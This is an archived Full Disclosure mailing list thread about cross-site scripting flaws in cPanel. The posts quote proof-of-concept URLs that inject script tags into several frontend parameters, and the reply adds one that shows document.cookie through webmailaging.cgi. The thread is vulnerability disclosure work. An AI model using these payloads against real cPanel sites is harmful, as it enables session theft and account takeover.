Full Disclosure mailing list archives
Re: cPanel Multiple Cross Site Scripting Vulnerability
From: Sumit Siddharth <sumit.siddharth () gmail com>
Date: Fri, 3 Feb 2006 12:18:27 +0530
An addition to your POC :) http://localhost:2095/webmailaging.cgi?numdays=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&ageaction=change Thanks Sumit On 2/3/06, Sullo <csullo () gmail com> wrote:
On 3/13/2004 I notified cPanel that they had major XSS issues in their backend... beyond what I was actually sending them or documenting, and they should fix them. They agreed. However, based on this, it doesn't look like they've done much in the two years since I posted: http://www.cirt.net/advisories/cpanel_xss.shtml On 2/2/06, simo () morx org <simo () morx org> wrote:Title: cPanel Multiple Cross Site Scripting Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org> Affected scripts with proof of concept exploit:http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=<script>alert('vul')</script>&domain=http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=<script>alert('vul')</script>&domain=xxxhttp://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0"><script>alert('vul')</script>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target="><script>alert('vul')</script>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx"><script>alert('vul')</script>&target=xxxhttp://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006"><script>alert('vul')</script>&domain=xxx&target=xxxhttp://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan"><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx-- http://www.cirt.net | http://www.osvdb.org/
-- Sumit Siddharth Information Security Analyst NII Consulting Web: www.nii.co.in ------------------------------------ NII Security Advisories http://www.nii.co.in/resources/advisories.html ------------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- cPanel Multiple Cross Site Scripting Vulnerability simo (Feb 02)
- Re: cPanel Multiple Cross Site Scripting Vulnerability Sullo (Feb 02)
- Re: cPanel Multiple Cross Site Scripting Vulnerability Sumit Siddharth (Feb 02)
- Re: cPanel Multiple Cross Site Scripting Vulnerability Sullo (Feb 02)